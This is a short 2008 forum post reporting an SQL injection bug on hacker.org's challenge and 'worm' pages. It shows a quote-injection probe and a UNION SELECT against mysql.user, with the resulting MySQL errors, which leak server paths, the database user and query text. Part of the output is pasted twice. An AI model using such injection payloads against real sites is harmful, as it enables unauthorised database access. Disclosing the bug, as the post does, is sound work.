little bug.......sql injection
Posted: Thu Aug 14, 2008 7:27 pm
http://www.hacker.org/challenge/chal.php?id=39'
result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/challenge/chal.php on line 35
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND solved = 1' at line 1, qry: SELECT COUNT(*) FROM challengeresult WHERE chalid = 39' AND solved = 1
http://www.hacker.org/worm/?botid=41%20 ... mysql.user
result:
SELECT command denied to user 'hacker_phpbb'@'geyser.dreamhost.com' for table 'user', qry: SELECT arena FROM bots WHERE id = 41 union select 1 from mysql.user
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/worm/worm.php on line 33[/img]
result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/challenge/chal.php on line 35
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND solved = 1' at line 1, qry: SELECT COUNT(*) FROM challengeresult WHERE chalid = 39' AND solved = 1
http://www.hacker.org/worm/?botid=41%20 ... mysql.user
result:
SELECT command denied to user 'hacker_phpbb'@'geyser.dreamhost.com' for table 'user', qry: SELECT arena FROM bots WHERE id = 41 union select 1 from mysql.user
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/worm/worm.php on line 33[/img]